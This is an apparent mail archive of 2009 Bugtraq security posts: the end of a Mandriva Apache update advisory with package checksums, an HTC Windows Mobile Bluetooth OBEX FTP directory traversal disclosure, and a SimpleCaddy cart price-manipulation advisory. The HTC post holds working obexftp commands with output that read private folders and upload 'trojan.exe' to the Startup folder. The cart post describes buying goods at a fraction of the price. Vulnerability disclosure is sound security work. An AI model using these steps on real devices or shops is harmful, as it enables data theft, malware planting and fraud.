 509e9bedb5f91343a676045f90bef558  2009.1/i586/apache-mod_proxy-2.2.11-10.4mdv2009.1.i586.rpm
 0c68c2755ad96c79f85a155bc079dd74  2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.4mdv2009.1.i586.rpm
 fdd37129c8ce847680456f5c08550968  2009.1/i586/apache-mod_ssl-2.2.11-10.4mdv2009.1.i586.rpm
 7549e14f72e5c8d3d6b408d52ef8a38c  2009.1/i586/apache-modules-2.2.11-10.4mdv2009.1.i586.rpm
 bc066f7e9cd881dfc170953094dc8319  2009.1/i586/apache-mod_userdir-2.2.11-10.4mdv2009.1.i586.rpm
 d32db804ae96533ca4c7b245eda01f98  2009.1/i586/apache-mpm-event-2.2.11-10.4mdv2009.1.i586.rpm
 868f2aaa6ef53c7c60b376202944e2aa  2009.1/i586/apache-mpm-itk-2.2.11-10.4mdv2009.1.i586.rpm
 681854ce611a93ec864c58785ab541f5  2009.1/i586/apache-mpm-peruser-2.2.11-10.4mdv2009.1.i586.rpm
 8e71ace64ffd0c8c37c83a0a12e1afbe  2009.1/i586/apache-mpm-prefork-2.2.11-10.4mdv2009.1.i586.rpm
 5e88459f25f50a6c3cde05a445b32594  2009.1/i586/apache-mpm-worker-2.2.11-10.4mdv2009.1.i586.rpm
 611db0cf3570f9f0377586bda61e59b0  2009.1/i586/apache-source-2.2.11-10.4mdv2009.1.i586.rpm 
 6e8db38ec06bfd8756037dec8ea71ca4  2009.1/SRPMS/apache-2.2.11-10.4mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 f140d32d2a4083fb5ee324b7572279f2  2009.1/x86_64/apache-base-2.2.11-10.4mdv2009.1.x86_64.rpm
 383bab22e1d9a9c61baeb10c3972443d  2009.1/x86_64/apache-devel-2.2.11-10.4mdv2009.1.x86_64.rpm
 007f4193dc68dcd34d48ab58bfd615ed  2009.1/x86_64/apache-htcacheclean-2.2.11-10.4mdv2009.1.x86_64.rpm
 428b7be1ac06755588bb28dc90b914ae  2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.4mdv2009.1.x86_64.rpm
 82158b3767bdb31fea07f5a442fcebd4  2009.1/x86_64/apache-mod_cache-2.2.11-10.4mdv2009.1.x86_64.rpm
 085eb05ff541f4699b0d2764b24c023a  2009.1/x86_64/apache-mod_dav-2.2.11-10.4mdv2009.1.x86_64.rpm
 7b831282bf0889312f8198c358393332  2009.1/x86_64/apache-mod_dbd-2.2.11-10.4mdv2009.1.x86_64.rpm
 f78e3d86a7b6af8b46c1864fcabd5455  2009.1/x86_64/apache-mod_deflate-2.2.11-10.4mdv2009.1.x86_64.rpm
 b985d6447095085c7713902a7253dc07  2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.4mdv2009.1.x86_64.rpm
 26e49e2067e11ea114dc8ddcac3d51c6  2009.1/x86_64/apache-mod_file_cache-2.2.11-10.4mdv2009.1.x86_64.rpm
 e4395af2defe1b01229fe1c4887a5e3b  2009.1/x86_64/apache-mod_ldap-2.2.11-10.4mdv2009.1.x86_64.rpm
 08c9824c79e51e956619dd1c1f5b2391  2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.4mdv2009.1.x86_64.rpm
 125634357057ef66b5a96c3f6d59f887  2009.1/x86_64/apache-mod_proxy-2.2.11-10.4mdv2009.1.x86_64.rpm
 48f5cce6d04c185bc8f74e9440d42d49  2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.4mdv2009.1.x86_64.rpm
 f5353fee0655a944233e95dc542475fc  2009.1/x86_64/apache-mod_ssl-2.2.11-10.4mdv2009.1.x86_64.rpm
 181766999217f26744e0b2a7179f074c  2009.1/x86_64/apache-modules-2.2.11-10.4mdv2009.1.x86_64.rpm
 9c75cd439b962a013d0a12be52eac839  2009.1/x86_64/apache-mod_userdir-2.2.11-10.4mdv2009.1.x86_64.rpm
 5ff7131c77436bd966c50618a23fac1f  2009.1/x86_64/apache-mpm-event-2.2.11-10.4mdv2009.1.x86_64.rpm
 2df4ee8eff3152a1c12fdfec6d09a4c7  2009.1/x86_64/apache-mpm-itk-2.2.11-10.4mdv2009.1.x86_64.rpm
 3e2e9c63c293ac81654e2792d941a8e5  2009.1/x86_64/apache-mpm-peruser-2.2.11-10.4mdv2009.1.x86_64.rpm
 db758092a06528c21fe8cb89dc72e44a  2009.1/x86_64/apache-mpm-prefork-2.2.11-10.4mdv2009.1.x86_64.rpm
 fbd4fa29c8e7fab05e6cd9ee73061e53  2009.1/x86_64/apache-mpm-worker-2.2.11-10.4mdv2009.1.x86_64.rpm
 2a3aa46f4a5ef9eb0f4fc60b8688b6d4  2009.1/x86_64/apache-source-2.2.11-10.4mdv2009.1.x86_64.rpm 
 6e8db38ec06bfd8756037dec8ea71ca4  2009.1/SRPMS/apache-2.2.11-10.4mdv2009.1.src.rpm

 Corporate 3.0:
 efc4dd61f307ba7ca3e78b702d14766a  corporate/3.0/i586/apache2-2.0.48-6.21.C30mdk.i586.rpm
 85ef73c40780432a49b5b52eaa10174c  corporate/3.0/i586/apache2-common-2.0.48-6.21.C30mdk.i586.rpm
 f8668cb4d5d5a7aeeec18ac9089ce224  corporate/3.0/i586/apache2-devel-2.0.48-6.21.C30mdk.i586.rpm
 9c7411c194f42dc2dda22e73b87871ac  corporate/3.0/i586/apache2-manual-2.0.48-6.21.C30mdk.i586.rpm
 addfed70aa6f5b9b95423166a9d9d2d0  corporate/3.0/i586/apache2-mod_cache-2.0.48-6.21.C30mdk.i586.rpm
 23d16c62736006e63f2290c6474a3c3f  corporate/3.0/i586/apache2-mod_dav-2.0.48-6.21.C30mdk.i586.rpm
 4c91c64f68bf7ee1381ba571363ff18b  corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.21.C30mdk.i586.rpm
 2e62901ddf70ec979ac1c31965817d5b  corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.i586.rpm
 c98277bc893e194a4cfcc6ee2efddcb9  corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.21.C30mdk.i586.rpm
 76a73eae916527a461e48f535ac92cff  corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.21.C30mdk.i586.rpm
 e2b217645c51bcecb6bade3230a2eda2  corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.i586.rpm
 f0ba56775f6d0a1cdc99c897d0b0a619  corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.21.C30mdk.i586.rpm
 29e2b0644b85e489935f195334820f61  corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.21.C30mdk.i586.rpm
 77836bdb2fca0e05208e44dc7ad8742e  corporate/3.0/i586/apache2-modules-2.0.48-6.21.C30mdk.i586.rpm
 74ba9e4ba64d33c863919363ab295e62  corporate/3.0/i586/apache2-source-2.0.48-6.21.C30mdk.i586.rpm
 943e2a0c5fcff6dfc142ff52ba3286eb  corporate/3.0/i586/libapr0-2.0.48-6.21.C30mdk.i586.rpm 
 b7bdb08234711c39badc0dc000ca3d20  corporate/3.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 b857a73720d5645127010c91e039a630  corporate/3.0/x86_64/apache2-2.0.48-6.21.C30mdk.x86_64.rpm
 e6e5eca1cadb862b47804cc09a3bd2b4  corporate/3.0/x86_64/apache2-common-2.0.48-6.21.C30mdk.x86_64.rpm
 f99582e97f0987e4b0be6add27723183  corporate/3.0/x86_64/apache2-devel-2.0.48-6.21.C30mdk.x86_64.rpm
 44072cb59097737b3c00f5e8298ed89b  corporate/3.0/x86_64/apache2-manual-2.0.48-6.21.C30mdk.x86_64.rpm
 2d333f222f65952cae96754f7f21b604  corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.21.C30mdk.x86_64.rpm
 0f5fa126d97dd1edc543a5b5de96c6e7  corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.21.C30mdk.x86_64.rpm
 555b2aedd6de7fb706995fb59fa6b4f3  corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.21.C30mdk.x86_64.rpm
 1541273d263d9bda5e5eafeba7861e0c  corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.x86_64.rpm
 295ef0b46ea5949fa0af116042936556  corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.21.C30mdk.x86_64.rpm
 0dd4ae154c12f557a71448b5bdb42479  corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.21.C30mdk.x86_64.rpm
 b93220ceeae20d88f4ae73182b9e72e6  corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.x86_64.rpm
 97dc6100022a85442ac7dd7da01fae34  corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.21.C30mdk.x86_64.rpm
 acb4b5e5955d42cca93d1ebec2328b23  corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.21.C30mdk.x86_64.rpm
 1af23190753541fe7d24f9bd85f57b1d  corporate/3.0/x86_64/apache2-modules-2.0.48-6.21.C30mdk.x86_64.rpm
 305ee3ac2af4c6ef4db046ecb3dd98ec  corporate/3.0/x86_64/apache2-source-2.0.48-6.21.C30mdk.x86_64.rpm
 e35e16fc12456a824a9e85dcfc9dbf0c  corporate/3.0/x86_64/lib64apr0-2.0.48-6.21.C30mdk.x86_64.rpm 
 b7bdb08234711c39badc0dc000ca3d20  corporate/3.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm

 Corporate 4.0:
 b9d526a415d82322c308912f97e4f1ae  corporate/4.0/i586/apache-base-2.2.3-1.7.20060mlcs4.i586.rpm
 a31613a66362403a6352d52047836e30  corporate/4.0/i586/apache-devel-2.2.3-1.7.20060mlcs4.i586.rpm
 dce72691c79bba01ee313fc378b36eb9  corporate/4.0/i586/apache-htcacheclean-2.2.3-1.7.20060mlcs4.i586.rpm
 b7937f4ef06f280f749c1fe5b7af10d2  corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.7.20060mlcs4.i586.rpm
 24ead4ff2d81737dcac9d625cdd5aaae  corporate/4.0/i586/apache-mod_cache-2.2.3-1.7.20060mlcs4.i586.rpm
 e1f31a31c845ef295ad5122a78ea3650  corporate/4.0/i586/apache-mod_dav-2.2.3-1.7.20060mlcs4.i586.rpm
 5ab10d768e463ae55838d347ec245102  corporate/4.0/i586/apache-mod_dbd-2.2.3-1.7.20060mlcs4.i586.rpm
 9b6b94cdeb55e147c7634297761990a0  corporate/4.0/i586/apache-mod_deflate-2.2.3-1.7.20060mlcs4.i586.rpm
 b1690a889bf2babfc911a2d600eb5081  corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.7.20060mlcs4.i586.rpm
 7f6bf2cfb1500cc55c3a195cc2b87a84  corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.7.20060mlcs4.i586.rpm
 6a57c241fab6d850ba46fc232132b2e0  corporate/4.0/i586/apache-mod_ldap-2.2.3-1.7.20060mlcs4.i586.rpm
 cf6a260d57b93c8e9bfe6fcbb97cb69a  corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.7.20060mlcs4.i586.rpm
 6a92e7840ff05818cca56ed1ee96df62  corporate/4.0/i586/apache-mod_proxy-2.2.3-1.7.20060mlcs4.i586.rpm
 f179ca37d885c3aaca4669a6173eb0c0  corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.7.20060mlcs4.i586.rpm
 52a7784816d6b4808a21e87990b40c70  corporate/4.0/i586/apache-mod_ssl-2.2.3-1.7.20060mlcs4.i586.rpm
 cdc4728fba27771d29728f1b1678d309  corporate/4.0/i586/apache-modules-2.2.3-1.7.20060mlcs4.i586.rpm
 cc4ca804e4fa51f7c4131ad16902ab9d  corporate/4.0/i586/apache-mod_userdir-2.2.3-1.7.20060mlcs4.i586.rpm
 bdee23bef1375ecbd47aeab1bdc9ed91  corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.7.20060mlcs4.i586.rpm
 449dfc068e06df184de8d36159b84765  corporate/4.0/i586/apache-mpm-worker-2.2.3-1.7.20060mlcs4.i586.rpm
 b5bd6a5ed078c35805b4ec2d9a788a79  corporate/4.0/i586/apache-source-2.2.3-1.7.20060mlcs4.i586.rpm 
 f206539ed9c3497f21f26a758d3403b4  corporate/4.0/SRPMS/apache-2.2.3-1.7.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 15ae114c8d2959ef5c6486029404f689  corporate/4.0/x86_64/apache-base-2.2.3-1.7.20060mlcs4.x86_64.rpm
 5198dcd3060de93577812740087fbc8d  corporate/4.0/x86_64/apache-devel-2.2.3-1.7.20060mlcs4.x86_64.rpm
 93d6afa11a57e157a53716ccf16cf0ef  corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.7.20060mlcs4.x86_64.rpm
 bc92cde6ea8b747d34f0a6ad5ac9e680  corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.7.20060mlcs4.x86_64.rpm
 7d08b4692a1e5ba32ffef6d734b96bcc  corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm
 87fc6d219c07f01a7f201f6bf413ff67  corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.7.20060mlcs4.x86_64.rpm
 feecfa18e01f0f03a262ea490fb0830f  corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.7.20060mlcs4.x86_64.rpm
 85a108666e4130d3a6b4fa0fed100aba  corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.7.20060mlcs4.x86_64.rpm
 a2d85bb6cd3d31c0d96f0fec454f2576  corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm
 e4027426a6dbfab2cb26e71266609ad3  corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm
 29df20ff497abe06723103fb5bdf5411  corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.7.20060mlcs4.x86_64.rpm
 fcae351832eaa3be0ee81bd1032a0ad2  corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm
 704b87767aa6fbb279cc8f755650af82  corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.7.20060mlcs4.x86_64.rpm
 544cf4f5cc0a9fafb62acb6808f44540  corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.7.20060mlcs4.x86_64.rpm
 b39cdcbc90bedfa443356c37451808c0  corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.7.20060mlcs4.x86_64.rpm
 f3d517adf5a4ce033d8d067fc6b14955  corporate/4.0/x86_64/apache-modules-2.2.3-1.7.20060mlcs4.x86_64.rpm
 c6c9c109cb6a41d52e702807e9704929  corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.7.20060mlcs4.x86_64.rpm
 3bf40c38ea6c6afb5d75b02e9425cbfc  corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.7.20060mlcs4.x86_64.rpm
 737c7f37638e53faf7cc269d6f197c2d  corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.7.20060mlcs4.x86_64.rpm
 9c793d83ccec6978fc1de8106ad05595  corporate/4.0/x86_64/apache-source-2.2.3-1.7.20060mlcs4.x86_64.rpm 
 f206539ed9c3497f21f26a758d3403b4  corporate/4.0/SRPMS/apache-2.2.3-1.7.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 55005338af9c4480caac9ffa86623264  mnf/2.0/i586/apache2-2.0.48-6.21.C30mdk.i586.rpm
 1263d183c09bcf57234a8f91de009e6b  mnf/2.0/i586/apache2-common-2.0.48-6.21.C30mdk.i586.rpm
 a5650d1b998d0e5b383d5ce47aa55433  mnf/2.0/i586/apache2-devel-2.0.48-6.21.C30mdk.i586.rpm
 d8b95b26cb53876fc299a64f1262b7db  mnf/2.0/i586/apache2-manual-2.0.48-6.21.C30mdk.i586.rpm
 69ac5aeed2fd42c52ce4f09fc5b70d62  mnf/2.0/i586/apache2-mod_cache-2.0.48-6.21.C30mdk.i586.rpm
 b6748d917602b92ea097129b317a5366  mnf/2.0/i586/apache2-mod_dav-2.0.48-6.21.C30mdk.i586.rpm
 950d5f9f1710a0b3f9071cd4adfaa28b  mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.21.C30mdk.i586.rpm
 4885836db49da3bbcb31f1b1769c14d4  mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.i586.rpm
 cf58f6eb5f73b9ea4f9d11132cda42db  mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.21.C30mdk.i586.rpm
 06d5bb0f4c027b27642ff5c5eade19a2  mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.21.C30mdk.i586.rpm
 4c76e76cea72d3449aceaf8ce91c6f44  mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.i586.rpm
 7b47e45702c799d496524b58b1128aaf  mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.21.C30mdk.i586.rpm
 19f0e35da2f28563cb11136ea7dfeee7  mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.21.C30mdk.i586.rpm
 940dbdedd9567b10414164a0d06e9898  mnf/2.0/i586/apache2-modules-2.0.48-6.21.C30mdk.i586.rpm
 3fac4349b9d5c061a0f83c16935eef8c  mnf/2.0/i586/apache2-source-2.0.48-6.21.C30mdk.i586.rpm
 1306a508a996ed429b1f022dca2890ec  mnf/2.0/i586/libapr0-2.0.48-6.21.C30mdk.i586.rpm 
 0640552aaad9af58f8f0dc97a2aaf6e9  mnf/2.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKVfgomqjQ0CJFipgRAuG7AJwNjHQS8BRukgf6jx7cwo7hVBjiFACgx/bp
cfmKStVOUmNQurlGpWWJe3I=g8pO
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:28 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b71
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40816-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id AE2A6ECC77
for <lists@securityspace.com>; Fri, 10 Jul 2009 08:37:29 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8AC0D143A1E; Fri, 10 Jul 2009 06:32:41 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 32086 invoked from network); 10 Jul 2009 10:52:51 -0000
Date: Fri, 10 Jul 2009 04:53:10 -0600
Message-Id: <200907101053.n6AArAjB029935@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: alberto.morenot@gmail.com
To: bugtraq@securityfocus.com
Subject: HTC / Windows Mobile OBEX FTP Service Directory Traversal
Status: RO

I shall complete the information related to Bugtraq ID: 33359

Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal 
Author: Alberto Moreno Tablado
Vendor: HTC
Vulnerable Products:
- HTC devices running Windows Mobile 6
- HTC devices running Windows Mobile 6.1
Non vulnerable products: 
- HTC devices running Windows Mobile 5.0
- Other vendors Windows Mobile devices
References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html

Summary:
HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder.

Description:
There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability only affects to this vendor specifically.

A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls from a Linux box to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and BD_ADDR address spoofing, can be used in order to avoid this. Devices must have Bluetooth enabled and File Sharing over Bluetooth service active when the attack is performed. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.

The scope of the Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system, download files contained in any folder as well as upload files to any folder.

A remote attacker who previously owned authentication and authorization rights over Bluetooth can perform three risky actions on the device:

1) Browse directories located out of the limits of the default shared folder

An attacker can discover the structure of the file system and access to any directory within it, including: 
- The flash hard drive
- The external storage card
- The internal mass storage memory, included in specific HTC devices

2) Download files without permission

An attacker can download sensitive files located anywhere in the file system, such as: 
- personal pictures and documents located in \My Documents or any other directory
- Contacts, Calendar & Tasks information located in \PIM.vol
- Temporary internet cache and cookies located in \Windows\Profiles\guest\
- emails located in \Windows\Messaging

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Messaging"
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "../../Windows/Messaging"... Sending ".."... Sending ".."... Sending "Windows"... done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <parent-folder name="Windows" />
  <folder name="Attachments" created="20090119T171318Z"/>
  <file name="6238002d81030102.mpb" created="20090119T173434Z" size="1521"/>
  <file name="6839002d81030102.mpb" created="20090119T171828Z" size="2659"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$

3) Upload malicious files 

An attacker can replace third party or system executable files with malicious files as well as upload trojans to any place in the filesystem, such as \Windows\Startup and, therefore, shall be executed the next time Windows Mobile inits.

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Startup" -p trojan.exe
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Sending ".."... Sending ".."... Sending "Windows"... Sending "Startup"... done
Sending "trojan.exe"...\done
Disconnecting...done
gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Startup"
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "../../Windows/Startup"... Sending ".."... Sending ".."... Sending "Windows"... done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <parent-folder name="Windows" />
  <file name="trojan.exe" created="20090122T121924Z" size="266168"/>
  <file name="poutlook.lnk" created="20061231T230022Z" size="14"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$

About affected and non affected products:
The following HTC devices are affected by this vulnerability: 
- HTC devices running Windows Mobile 6 Professional
- HTC devices running Windows Mobile 6 Standard
- HTC devices running Windows Mobile 6.1 Professional 
- HTC devices running Windows Mobile 6.1 Standard

You can find a list of tested HTC devices proved to be vulnerable at http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html#AffectedProducts

HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version.

Other vendors Windows Mobile devices are not affected either: ASUS, Samsung, LG, ...

Vendor Status:
The vulnerability was first disclosed on 2009/01/19 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also vulnerable. Microsoft was contacted on 2009/01/22 and this information was not made public because last mobile phones manufactured were vulnerable.

Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors Windows Mobile devices are not affected.

HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning on the exploitation of the flaw. However, no patches are known to be released for this security flaw.

Workaround:
This vulnerability is a zero-day threat. This means that all devices shipped up to date (July 2009) may be vulnerable.

Wait for proper vendor response and updates.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

Alberto

From - Mon Jul 13 18:03:28 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b73
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40815-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 0BC35ECF23
for <lists@securityspace.com>; Fri, 10 Jul 2009 09:30:03 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 6F519143782; Fri, 10 Jul 2009 06:32:16 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21102 invoked from network); 9 Jul 2009 22:36:00 -0000
Date: Thu, 9 Jul 2009 16:35:58 -0600
Message-Id: <200907092235.n69MZwUB001143@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: domingos.bruges@senked.com
To: bugtraq@securityfocus.com
Subject: Atlantic SimpleCaddy Shopping Cart Price Manipulation
Status: RO

SENKED-2009-0001 - Atlantic SimpleCaddy Shopping Cart Price Manipulation

senked security advisory
http://www.senked.com/

Date Published: 2009-07-01

Last Update: 2009-07-01

Advisory ID: SENKED-2009-0001

Bugtraq ID: none

CVE Name: none

Title: Atlanticintelligence SimpleCaddy Shoopuing Cart Price Manipulation

Class: Parameter Manipulation

Remotely Exploitable: Yes

Locally Exploitable: No

Advisory URL: http://www.senked.com/index.php/seguranca/advisories/58-advisory-senked-2009-0001

Vendors contacted: The vendor has been contacted and by the time of this advisory, a patch was not yet produced.

Vulnerable Packages: All versions < 1.7

Credits:
This vulnerability was found and researched by Domingos Bruges from senked Security.

Product Overview:
SimpleCaddy aims to be a simple yet powerful shopping cart solution for Joomla. It uses standard content to show the products' details and a small plugin on that page to present the "Add to Cart" functionality.

Technical Description - Exploit / Concept Code:
The vulnerability is due to improper handling of user input parameters. The product catalog typically consists of a product code, a product description, pricing and other information. When a customer selects a product from the catalog, he places it in his shopping cart. Weak integration of the product catalog and the shopping cart leads to security vulnerabilities.
This Product allows a user to manipulate the price while selecting the product quantity. This will conduct in users buying products at reduced prices.

Vulnerability Exploitation:
In this case, quantity validation is an important issue. There's correct validation of negative quantity inputs, but what happens if the customer enter a fractional quantity?
To exploit this vulnerability the user just has to enter a fractional quantity. If an user inputs 0,3 as quantity, the price will be recalculated as (standard price) x (quantity). This will lead the user to buy the product by 30% of its original price.

Resolution:
A well-implemented shopping cart application interfaces with the back-end product information database. Then parameters such as prices are derived from the database instead of relying on HTML form fields or any user inputs being passed back and forth. Also validations should not be done on the user side, allowing him to manipulate all possible validations. 

From - Mon Jul 13 18:03:28 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b7c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40817-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id F2A99EC57E
for <lists@securityspace.com>; Fri, 10 Jul 2009 13:51:45 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3AC89237441; Fri, 10 Jul 2009 11:25:44 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
